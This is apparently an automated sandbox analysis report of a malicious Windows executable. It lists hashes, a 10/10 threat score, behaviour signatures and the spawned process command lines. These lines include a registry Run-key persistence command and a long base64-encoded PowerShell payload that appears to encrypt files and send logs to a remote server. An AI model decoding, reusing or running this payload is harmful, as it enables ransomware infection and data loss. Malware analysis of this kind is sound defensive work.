e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b

General

Target

e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe
Size

45KB
MD5

0b08569ed102d22ba7c1c8f169f65009
SHA1

47ee1fa9d9d8cbe9b46bd1c235e1588b7ea53dc2
SHA256

e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b
SHA512

c5ab603dada3cb129da4f93483a8119e8bf50494c656669bed9ebf3a158f3132f9948cede40cbcb8cae000d32528ef3434680db92976eaf978e273dfce168dc1
SSDEEP

768:H9tDb7iaMIn7zAEleijtWpIS6ATY+W+ZEn3lFEhuc2cIMKKmxcBAsYcRA:H9tTX

Score

10^/10

persistence

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	5044	powershell.exe

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

26 820 powershell.exe
37 3436 powershell.exe

flow	pid	process
26	820	powershell.exe
37	3436	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a808258d-deb0-4fa2-b49f-29a3f80241c0 = "powershell.exe -command powershell.exe -windowstyle Minimized -enc $((Get-ItemProperty \"HKCU:\\Software\\a808258d-deb0-4fa2-b49f-29a3f80241c0\").Code)"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

820 powershell.exe
820 powershell.exe
3436 powershell.exe
3436 powershell.exe

pid	process
820	powershell.exe
820	powershell.exe
3436	powershell.exe
3436	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	820	powershell.exe
Token: SeIncreaseQuotaPrivilege	820	powershell.exe
Token: SeSecurityPrivilege	820	powershell.exe
Token: SeTakeOwnershipPrivilege	820	powershell.exe
Token: SeLoadDriverPrivilege	820	powershell.exe
Token: SeSystemProfilePrivilege	820	powershell.exe
Token: SeSystemtimePrivilege	820	powershell.exe
Token: SeProfSingleProcessPrivilege	820	powershell.exe
Token: SeIncBasePriorityPrivilege	820	powershell.exe
Token: SeCreatePagefilePrivilege	820	powershell.exe
Token: SeBackupPrivilege	820	powershell.exe
Token: SeRestorePrivilege	820	powershell.exe
Token: SeShutdownPrivilege	820	powershell.exe
Token: SeDebugPrivilege	820	powershell.exe
Token: SeSystemEnvironmentPrivilege	820	powershell.exe
Token: SeRemoteShutdownPrivilege	820	powershell.exe
Token: SeUndockPrivilege	820	powershell.exe
Token: SeManageVolumePrivilege	820	powershell.exe
Token: 33	820	powershell.exe
Token: 34	820	powershell.exe
Token: 35	820	powershell.exe
Token: 36	820	powershell.exe
Token: SeIncreaseQuotaPrivilege	820	powershell.exe
Token: SeSecurityPrivilege	820	powershell.exe
Token: SeTakeOwnershipPrivilege	820	powershell.exe
Token: SeLoadDriverPrivilege	820	powershell.exe
Token: SeSystemProfilePrivilege	820	powershell.exe
Token: SeSystemtimePrivilege	820	powershell.exe
Token: SeProfSingleProcessPrivilege	820	powershell.exe
Token: SeIncBasePriorityPrivilege	820	powershell.exe
Token: SeCreatePagefilePrivilege	820	powershell.exe
Token: SeBackupPrivilege	820	powershell.exe
Token: SeRestorePrivilege	820	powershell.exe
Token: SeShutdownPrivilege	820	powershell.exe
Token: SeDebugPrivilege	820	powershell.exe
Token: SeSystemEnvironmentPrivilege	820	powershell.exe
Token: SeRemoteShutdownPrivilege	820	powershell.exe
Token: SeUndockPrivilege	820	powershell.exe
Token: SeManageVolumePrivilege	820	powershell.exe
Token: 33	820	powershell.exe
Token: 34	820	powershell.exe
Token: 35	820	powershell.exe
Token: 36	820	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeIncreaseQuotaPrivilege	3436	powershell.exe
Token: SeSecurityPrivilege	3436	powershell.exe
Token: SeTakeOwnershipPrivilege	3436	powershell.exe
Token: SeLoadDriverPrivilege	3436	powershell.exe
Token: SeSystemProfilePrivilege	3436	powershell.exe
Token: SeSystemtimePrivilege	3436	powershell.exe
Token: SeProfSingleProcessPrivilege	3436	powershell.exe
Token: SeIncBasePriorityPrivilege	3436	powershell.exe
Token: SeCreatePagefilePrivilege	3436	powershell.exe
Token: SeBackupPrivilege	3436	powershell.exe
Token: SeRestorePrivilege	3436	powershell.exe
Token: SeShutdownPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeSystemEnvironmentPrivilege	3436	powershell.exe
Token: SeRemoteShutdownPrivilege	3436	powershell.exe
Token: SeUndockPrivilege	3436	powershell.exe
Token: SeManageVolumePrivilege	3436	powershell.exe
Token: 33	3436	powershell.exe
Token: 34	3436	powershell.exe
Token: 35	3436	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe

description	pid	process	target process
PID 1664 wrote to memory of 820	1664	e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe	powershell.exe
PID 1664 wrote to memory of 820	1664	e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe
"C:\Users\Admin\AppData\Local\Temp\e6ce1897ece2f6cdd6c60aa4fa268d9cf6e887b2776130ec7c302d75edbb022b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABwAGwAIAA9ACAAIgBKAEEAQgB6AEEASABJAEEAZABnAEEAZwBBAEQAMABBAEkAQQBBAGkAQQBHAE0AQQBNAGcAQQB1AEEASABrAEEAWQBRAEIAeQBBAEgAUQBBAGQAQQBCAGsAQQBHADQAQQBMAGcAQgBrAEEARwBVAEEATwBnAEEAeABBAEQAVQBBAE0AdwBBAHoAQQBEAEkAQQBJAGcAQQBOAEEAQQBvAEEASgBBAEIAMABBAEcATQBBAEkAQQBBADkAQQBDAEEAQQBJAGcAQgBVAEEARwBVAEEAYwB3AEIAMABBAEUATQBBAFkAUQBCAHoAQQBHAFUAQQBJAEEAQgBVAEEARQBNAEEATQBBAEEAMABBAEMAOABBAE0AQQBBADEAQQBDAEkAQQBEAFEAQQBLAEEAQwBRAEEAUgBRAEIAeQBBAEgASQBBAGIAdwBCAHkAQQBFAEUAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEYAQQBBAGMAZwBCAGwAQQBHAFkAQQBaAFEAQgB5AEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAEkAQQBBADkAQQBDAEEAQQBJAGcAQgBUAEEARwBrAEEAYgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBRAHcAQgB2AEEARwA0AEEAZABBAEIAcABBAEcANABBAGQAUQBCAGwAQQBDAEkAQQBEAFEAQQBLAEEAQwBRAEEAYgBRAEIANQBBAEcAawBBAGMAQQBBAGcAQQBEADAAQQBJAEEAQQBvAEEARQBjAEEAWgBRAEIAMABBAEMAMABBAFQAZwBCAGwAQQBIAFEAQQBTAFEAQgBRAEEARQBNAEEAYgB3AEIAdQBBAEcAWQBBAGEAUQBCAG4AQQBIAFUAQQBjAGcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCADgAQQBDAEEAQQBWAHcAQgBvAEEARwBVAEEAYwBnAEIAbABBAEMAMABBAFQAdwBCAGkAQQBHAG8AQQBaAFEAQgBqAEEASABRAEEASQBBAEIANwBBAEEAMABBAEMAZwBBAGsAQQBGADgAQQBMAGcAQgBKAEEARgBBAEEAZABnAEEAMABBAEUAUQBBAFoAUQBCAG0AQQBHAEUAQQBkAFEAQgBzAEEASABRAEEAUgB3AEIAaABBAEgAUQBBAFoAUQBCADMAQQBHAEUAQQBlAFEAQQBnAEEAQwAwAEEAYgBnAEIAbABBAEMAQQBBAEoAQQBCAHUAQQBIAFUAQQBiAEEAQgBzAEEAQwBBAEEATABRAEIAaABBAEcANABBAFoAQQBBAGcAQQBDAFEAQQBYAHcAQQB1AEEARQA0AEEAWgBRAEIAMABBAEUARQBBAFoAQQBCAGgAQQBIAEEAQQBkAEEAQgBsAEEASABJAEEATABnAEIAVABBAEgAUQBBAFkAUQBCADAAQQBIAFUAQQBjAHcAQQBnAEEAQwAwAEEAYgBnAEIAbABBAEMAQQBBAEkAZwBCAEUAQQBHAGsAQQBjAHcAQgBqAEEARwA4AEEAYgBnAEIAdQBBAEcAVQBBAFkAdwBCADAAQQBHAFUAQQBaAEEAQQBpAEEAQQAwAEEAQwBnAEIAOQBBAEMAawBBAEwAZwBCAEoAQQBGAEEAQQBkAGcAQQAwAEEARQBFAEEAWgBBAEIAawBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBMAGcAQgBKAEEARgBBAEEAUQBRAEIAawBBAEcAUQBBAGMAZwBCAGwAQQBIAE0AQQBjAHcAQQBOAEEAQQBvAEEAWgBnAEIAMQBBAEcANABBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEAVABBAEIAdgBBAEcAYwBBAEkAQQBCADcAQQBBADAAQQBDAGcAQgB3AEEARwBFAEEAYwBnAEIAaABBAEcAMABBAEsAQQBBAGsAQQBHADAAQQBjAHcAQgBuAEEAQwBrAEEARABRAEEASwBBAEMAZwBBAGEAUQBCADMAQQBIAEkAQQBJAEEAQQB0AEEARgBVAEEAYwBnAEIAcABBAEMAQQBBAEkAZwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEMAUQBBAGMAdwBCAHkAQQBIAFkAQQBMAHcAQgBzAEEARwA4AEEAWgB3AEEAaQBBAEMAQQBBAEwAUQBCAEMAQQBHADgAQQBaAEEAQgA1AEEAQwBBAEEAUQBBAEIANwBBAEcAawBBAGMAQQBBADkAQQBDAFEAQQBiAFEAQgA1AEEARwBrAEEAYwBBAEEANwBBAEMAQQBBAGIAUQBCAGwAQQBIAE0AQQBjAHcAQgBoAEEARwBjAEEAWgBRAEEAOQBBAEMASQBBAEoAQQBCADAAQQBHAE0AQQBJAEEAQQBrAEEARwAwAEEAYwB3AEIAbgBBAEMASQBBAGYAUQBBAGcAQQBDADAAQQBWAFEAQgB6AEEARwBVAEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBGAEEAQQBZAFEAQgB5AEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEsAUQBBAGcAQQBIAHcAQQBJAEEAQgBQAEEASABVAEEAZABBAEEAdABBAEUANABBAGQAUQBCAHMAQQBHAHcAQQBJAEEAQQBOAEEAQQBvAEEAZgBRAEEATgBBAEEAbwBBAFQAQQBCAHYAQQBHAGMAQQBJAEEAQQBpAEEASABJAEEAZABRAEIAdQBBAEcANABBAGEAUQBCAHUAQQBHAGMAQQBJAGcAQQBOAEEAQQBvAEEASgBBAEIAdwBBAEgAVQBBAFkAZwBBAGcAQQBEADAAQQBJAEEAQQBuAEEARAB3AEEAVQBnAEIAVABBAEUARQBBAFMAdwBCAGwAQQBIAGsAQQBWAGcAQgBoAEEARwB3AEEAZABRAEIAbABBAEQANABBAFAAQQBCAE4AQQBHADgAQQBaAEEAQgAxAEEARwB3AEEAZABRAEIAegBBAEQANABBAGUAUQBBADQAQQBGAGsAQQBNAEEAQgBNAEEARwA4AEEAVABBAEEAdgBBAEQARQBBAEsAdwBCAEMAQQBFAHMAQQBWAFEAQgAyAEEASABjAEEAZABnAEIAMABBAEcAVQBBAGIAUQBCAHYAQQBGAFUAQQBUAHcAQQB5AEEARABJAEEAYQBnAEEANQBBAEYAVQBBAGUAQQBCAHQAQQBFADAAQQBSAHcAQgBwAEEARgBrAEEAWQBRAEIAMABBAEUANABBAGEAQQBCAGoAQQBFAFkAQQBiAHcAQQAyAEEARABJAEEATgBnAEIAUgBBAEUAdwBBAGEAUQBCADEAQQBHAFUAQQBlAGcAQgBKAEEARQBJAEEAWQBnAEIAaABBAEYAZwBBAFMAdwBCAFYAQQBHAGsAQQBVAEEAQgBIAEEARQA0AEEAWgBRAEIAMwBBAEUAawBBAFkAZwBCAEQAQQBEAEEAQQBkAEEAQQAwAEEARwAwAEEAWgBnAEIARgBBAEUASQBBAFoAQQBCAFIAQQBDAHMAQQBjAEEAQgAzAEEARwBVAEEAYwBRAEEAMABBAEYATQBBAFQAQQBCAEoAQQBIAEkAQQBTAEEAQgBaAEEASABZAEEAVQBnAEEAMgBBAEcATQBBAFUAQQBBAHoAQQBIAFkAQQBTAHcAQgBMAEEARQBVAEEARABRAEEASwBBAEYAbwBBAE0AQQBCAHcAQQBGAEUAQQBLAHcAQgBHAEEARgBFAEEATQBBAEIAMQBBAEQAUQBBAFMAUQBCAHoAQQBGAEkAQQBVAGcAQgBoAEEARABNAEEAYgB3AEIAcABBAEgAZwBBAFUAQQBBADAAQQBFADQAQQBUAGcAQgBxAEEARwA4AEEAUQB3AEIAMQBBAEQAVQBBAGQAUQBCAG4AQQBGAGcAQQBVAGcAQgAwAEEARwBVAEEAUgBnAEIAbgBBAEcAUQBBAGUAQQBCAE8AQQBFADAAQQBWAFEAQgBWAEEASABvAEEASwB3AEEAMgBBAEUAMABBAGUAZwBCAGsAQQBFAEkAQQBWAHcAQQA1AEEASABnAEEAYQBBAEEANABBAEQATQBBAFoAUQBBADMAQQBHAGsAQQBjAFEAQgBYAEEASABBAEEAWgBRAEIAbQBBAEcAcwBBAFMAdwBCAGkAQQBEAEEAQQBNAGcAQgByAEEARgBBAEEAVwBnAEIAdwBBAEcAZwBBAEsAdwBCAFYAQQBEADAAQQBQAEEAQQB2AEEARQAwAEEAYgB3AEIAawBBAEgAVQBBAGIAQQBCADEAQQBIAE0AQQBQAGcAQQA4AEEARQBVAEEAZQBBAEIAdwBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBkAEEAQQArAEEARQBFAEEAVQBRAEIAQgBBAEUASQBBAFAAQQBBAHYAQQBFAFUAQQBlAEEAQgB3AEEARwA4AEEAYgBnAEIAbABBAEcANABBAGQAQQBBACsAQQBEAHcAQQBMAHcAQgBTAEEARgBNAEEAUQBRAEIATABBAEcAVQBBAGUAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEAUABnAEEAbgBBAEEAMABBAEMAZwBBAGsAQQBGAEkAQQBVAHcAQgBCAEEAQwBBAEEAUABRAEEAZwBBAEUANABBAFoAUQBCADMAQQBDADAAQQBUAHcAQgBpAEEARwBvAEEAWgBRAEIAagBBAEgAUQBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYATQBBAFoAUQBCAGoAQQBIAFUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEUATQBBAGMAZwBCADUAQQBIAEEAQQBkAEEAQgB2AEEARwBjAEEAYwBnAEIAaABBAEgAQQBBAGEAQQBCADUAQQBDADQAQQBVAGcAQgBUAEEARQBFAEEAUQB3AEIAeQBBAEgAawBBAGMAQQBCADAAQQBHADgAQQBVAHcAQgBsAEEASABJAEEAZABnAEIAcABBAEcATQBBAFoAUQBCAFEAQQBIAEkAQQBiAHcAQgAyAEEARwBrAEEAWgBBAEIAbABBAEgASQBBAEQAUQBBAEsAQQBDAFEAQQBVAGcAQgBUAEEARQBFAEEATABnAEIARwBBAEgASQBBAGIAdwBCAHQAQQBGAGcAQQBiAFEAQgBzAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBDAGcAQQBKAEEAQgB3AEEASABVAEEAWQBnAEEAcABBAEEAMABBAEMAZwBBAGsAQQBHAGMAQQBiAEEAQgB2AEEARwBJAEEAWQBRAEIAcwBBAEQAbwBBAFkAdwBBAGcAQQBEADAAQQBJAEEAQQB3AEEAQQAwAEEAQwBnAEIAbQBBAEgAVQBBAGIAZwBCAGoAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEASQBBAEIARgBBAEcANABBAFkAdwBBAGcAQQBIAHMAQQBEAFEAQQBLAEEASABBAEEAWQBRAEIAeQBBAEcARQBBAGIAUQBBAGcAQQBDAGcAQQBJAEEAQQBrAEEASABBAEEASQBBAEEAcABBAEEAMABBAEMAZwBCADAAQQBIAEkAQQBlAFEAQQBnAEEASABzAEEARABRAEEASwBBAEMAUQBBAGEAdwBCAGwAQQBIAGsAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEgAawBBAGMAdwBCADAAQQBHAFUAQQBiAFEAQQB1AEEARQBFAEEAYwBnAEIAeQBBAEcARQBBAGUAUQBCAGQAQQBEAG8AQQBPAGcAQgBEAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBnAEIAagBBAEcAVQBBAEsAQQBCAGIAQQBHAEkAQQBlAFEAQgAwAEEARwBVAEEAWABRAEEAcwBBAEQATQBBAE0AZwBBAHAAQQBBADAAQQBDAGcAQQBvAEEARQA0AEEAWgBRAEIAMwBBAEMAMABBAFQAdwBCAGkAQQBHAG8AQQBaAFEAQgBqAEEASABRAEEASQBBAEEAdABBAEYAUQBBAGUAUQBCAHcAQQBHAFUAQQBUAGcAQgBoAEEARwAwAEEAWgBRAEEAZwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwA0AEEAVQBnAEIAaABBAEcANABBAFoAQQBCAHYAQQBHADAAQQBLAFEAQQB1AEEARQA0AEEAWgBRAEIANABBAEgAUQBBAFEAZwBCADUAQQBIAFEAQQBaAFEAQgB6AEEAQwBnAEEASgBBAEIAcgBBAEcAVQBBAGUAUQBBAHAAQQBBADAAQQBDAGcAQQBrAEEARwBzAEEAWgBRAEIANQBBAEYAOABBAFoAUQBCAHUAQQBHAE0AQQBJAEEAQQA5AEEAQwBBAEEASgBBAEIAUwBBAEYATQBBAFEAUQBBAHUAQQBFAFUAQQBiAGcAQgBqAEEASABJAEEAZQBRAEIAdwBBAEgAUQBBAEsAQQBBAGsAQQBHAHMAQQBaAFEAQgA1AEEAQwB3AEEASgBBAEIAMABBAEgASQBBAGQAUQBCAGwAQQBDAGsAQQBEAFEAQQBLAEEAQwBRAEEAUQBRAEEAZwBBAEQAMABBAEkAQQBCAE8AQQBHAFUAQQBkAHcAQQB0AEEARQA4AEEAWQBnAEIAcQBBAEcAVQBBAFkAdwBCADAAQQBDAEEAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAEwAZwBCAFQAQQBHAFUAQQBZAHcAQgAxAEEASABJAEEAYQBRAEIAMABBAEgAawBBAEwAZwBCAEQAQQBIAEkAQQBlAFEAQgB3AEEASABRAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHcAQQBHAGcAQQBlAFEAQQB1AEEARQBFAEEAWgBRAEIAegBBAEUAMABBAFkAUQBCAHUAQQBHAEUAQQBaAHcAQgBsAEEARwBRAEEARABRAEEASwBBAEMAUQBBAFEAUQBBAHUAQQBFADAAQQBiAHcAQgBrAEEARwBVAEEASQBBAEEAOQBBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYATQBBAFoAUQBCAGoAQQBIAFUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEUATQBBAGMAZwBCADUAQQBIAEEAQQBkAEEAQgB2AEEARwBjAEEAYwBnAEIAaABBAEgAQQBBAGEAQQBCADUAQQBDADQAQQBRAHcAQgBwAEEASABBAEEAYQBBAEIAbABBAEgASQBBAFQAUQBCAHYAQQBHAFEAQQBaAFEAQgBkAEEARABvAEEATwBnAEIARABBAEUASQBBAFEAdwBBAE4AQQBBAG8AQQBKAEEAQgBCAEEAQwA0AEEAVQBBAEIAaABBAEcAUQBBAFoAQQBCAHAAQQBHADQAQQBaAHcAQQBnAEEARAAwAEEASQBBAEIAYgBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwA0AEEAVQB3AEIAbABBAEcATQBBAGQAUQBCAHkAQQBHAGsAQQBkAEEAQgA1AEEAQwA0AEEAUQB3AEIAeQBBAEgAawBBAGMAQQBCADAAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYwBBAEIAbwBBAEgAawBBAEwAZwBCAFEAQQBHAEUAQQBaAEEAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEUAMABBAGIAdwBCAGsAQQBHAFUAQQBYAFEAQQA2AEEARABvAEEAVQBBAEIATABBAEUATQBBAFUAdwBBADMAQQBBADAAQQBDAGcAQQBrAEEARQBFAEEATABnAEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBVAHcAQgBwAEEASABvAEEAWgBRAEEAZwBBAEQAMABBAEkAQQBBAHgAQQBEAEkAQQBPAEEAQQBOAEEAQQBvAEEASgBBAEIAQgBBAEMANABBAFMAdwBCAGwAQQBIAGsAQQBVAHcAQgBwAEEASABvAEEAWgBRAEEAZwBBAEQAMABBAEkAQQBBAHkAQQBEAFUAQQBOAGcAQQBOAEEAQQBvAEEASgBBAEIAQgBBAEMANABBAFMAdwBCAGwAQQBIAGsAQQBJAEEAQQA5AEEAQwBBAEEASgBBAEIAcgBBAEcAVQBBAGUAUQBBAE4AQQBBAG8AQQBKAEEAQgBCAEEAQwA0AEEAUwBRAEIAVwBBAEMAQQBBAFAAUQBBAGcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQgBpAEEASABrAEEAZABBAEIAbABBAEYAcwBBAFgAUQBBAGcAQQBEAEUAQQBOAGcAQQBOAEEAQQBvAEEASgBBAEIAaQBBAEMAQQBBAFAAUQBBAGcAQQBGAHMAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAEwAZwBCAEoAQQBFADgAQQBMAGcAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAMABBAE8AZwBBADYAQQBGAEkAQQBaAFEAQgBoAEEARwBRAEEAUQBRAEIAcwBBAEcAdwBBAFEAZwBCADUAQQBIAFEAQQBaAFEAQgB6AEEAQwBnAEEASgBBAEIAdwBBAEMAawBBAEQAUQBBAEsAQQBDAFEAQQBaAFEAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAcwBBAFoAUQBCADUAQQBGADgAQQBaAFEAQgB1AEEARwBNAEEASQBBAEEAcgBBAEMAQQBBAEsAQQBBAGsAQQBFAEUAQQBMAGcAQgBEAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBCAEYAQQBHADQAQQBZAHcAQgB5AEEASABrAEEAYwBBAEIAMABBAEcAOABBAGMAZwBBAG8AQQBDAGsAQQBLAFEAQQB1AEEARgBRAEEAYwBnAEIAaABBAEcANABBAGMAdwBCAG0AQQBHADgAQQBjAGcAQgB0AEEARQBZAEEAYQBRAEIAdQBBAEcARQBBAGIAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEASwBBAEEAawBBAEcASQBBAEwAQQBBAGcAQQBEAEEAQQBMAEEAQQBnAEEAQwBRAEEAWQBnAEEAdQBBAEUAdwBBAFoAUQBCAHUAQQBHAGMAQQBkAEEAQgBvAEEAQwBrAEEARABRAEEASwBBAEYAcwBBAFUAdwBCADUAQQBIAE0AQQBkAEEAQgBsAEEARwAwAEEATABnAEIASgBBAEUAOABBAEwAZwBCAEcAQQBHAGsAQQBiAEEAQgBsAEEARgAwAEEATwBnAEEANgBBAEYAYwBBAGMAZwBCAHAAQQBIAFEAQQBaAFEAQgBCAEEARwB3AEEAYgBBAEIAQwBBAEgAawBBAGQAQQBCAGwAQQBIAE0AQQBLAEEAQQBrAEEASABBAEEATABBAEEAZwBBAEMAUQBBAFoAUQBBAHAAQQBBADAAQQBDAGcAQgBTAEEARwBVAEEAYgBnAEIAaABBAEcAMABBAFoAUQBBAHQAQQBFAGsAQQBkAEEAQgBsAEEARwAwAEEASQBBAEEAdABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBrAEEASABBAEEASQBBAEEAdABBAEUANABBAFoAUQBCADMAQQBFADQAQQBZAFEAQgB0AEEARwBVAEEASQBBAEEAaQBBAEMAUQBBAGMAQQBBAHUAQQBHAE0AQQBjAGcAQgB3AEEASABRAEEASQBnAEEATgBBAEEAbwBBAEoAQQBCAG4AQQBHAHcAQQBiAHcAQgBpAEEARwBFAEEAYgBBAEEANgBBAEcATQBBAEsAdwBBAHIAQQBBADAAQQBDAGcAQgA5AEEAQwBBAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBDAEEAQQBlAHcAQQBOAEEAQQBvAEEAVgB3AEIAeQBBAEcAawBBAGQAQQBCAGwAQQBDADAAQQBTAEEAQgB2AEEASABNAEEAZABBAEEAZwBBAEMAUQBBAFgAdwBBAHUAQQBFAFUAQQBlAEEAQgBqAEEARwBVAEEAYwBBAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDADQAQQBUAFEAQgBsAEEASABNAEEAYwB3AEIAaABBAEcAYwBBAFoAUQBBAE4AQQBBAG8AQQBmAFEAQQBOAEEAQQBvAEEAZgBRAEEATgBBAEEAbwBBAEoAQQBCAG0AQQBHAGsAQQBiAEEAQgBsAEEASABNAEEASQBBAEEAOQBBAEMAQQBBAFIAdwBCAGwAQQBIAFEAQQBMAFEAQgBEAEEARwBrAEEAYgBRAEIASgBBAEcANABBAGMAdwBCADAAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEASQBBAEEAdABBAEYARQBBAGQAUQBCAGwAQQBIAEkAQQBlAFEAQQBnAEEAQwBJAEEAVQB3AEIARgBBAEUAdwBBAFIAUQBCAEQAQQBGAFEAQQBJAEEAQQBxAEEAQwBBAEEAUgBnAEIAUwBBAEUAOABBAFQAUQBBAGcAQQBFAE0AQQBTAFEAQgBOAEEARgA4AEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEAQwBBAEEAVgB3AEIASQBBAEUAVQBBAFUAZwBCAEYAQQBDAEEAQQBUAGcAQgBQAEEARgBRAEEASQBBAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBUAEEAQgBKAEEARQBzAEEAUgBRAEEAZwBBAEMAYwBBAFkAdwBBADYAQQBGAHcAQQBYAEEAQgAzAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAHoAQQBGAHcAQQBYAEEAQQBsAEEAQwBjAEEASQBBAEIAQgBBAEUANABBAFIAQQBBAE4AQQBBAG8AQQBLAEEAQgBGAEEASABnAEEAZABBAEIAbABBAEcANABBAGMAdwBCAHAAQQBHADgAQQBiAGcAQQA5AEEAQwBjAEEAYwBBAEIAawBBAEcAWQBBAEoAdwBBAGcAQQBHADgAQQBjAGcAQQBnAEEARQBVAEEAZQBBAEIAMABBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEARAAwAEEASgB3AEIAawBBAEcAOABBAFkAdwBCADQAQQBDAGMAQQBJAEEAQgB2AEEASABJAEEASQBBAEIARgBBAEgAZwBBAGQAQQBCAGwAQQBHADQAQQBjAHcAQgBwAEEARwA4AEEAYgBnAEEAOQBBAEMAYwBBAFoAQQBCAHYAQQBHAE0AQQBKAHcAQQBnAEEARwA4AEEAYwBnAEEAZwBBAEUAVQBBAGUAQQBCADAAQQBHAFUAQQBiAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEQAMABBAEoAdwBCADQAQQBHAHcAQQBjAHcAQgA0AEEAQwBjAEEASQBBAEIAdgBBAEgASQBBAEkAQQBCAEYAQQBIAGcAQQBkAEEAQgBsAEEARwA0AEEAYwB3AEIAcABBAEcAOABBAGIAZwBBADkAQQBDAGMAQQBlAEEAQgBzAEEASABNAEEASgB3AEEAZwBBAEcAOABBAGMAZwBBAGcAQQBFAFUAQQBlAEEAQgAwAEEARwBVAEEAYgBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBEADAAQQBKAHcAQgBxAEEASABBAEEAWgB3AEEAbgBBAEMAQQBBAGIAdwBCAHkAQQBDAEEAQQBSAFEAQgA0AEEASABRAEEAWgBRAEIAdQBBAEgATQBBAGEAUQBCAHYAQQBHADQAQQBQAFEAQQBuAEEARwBvAEEAYwBBAEIAbABBAEcAYwBBAEoAdwBBAGcAQQBHADgAQQBjAGcAQQBn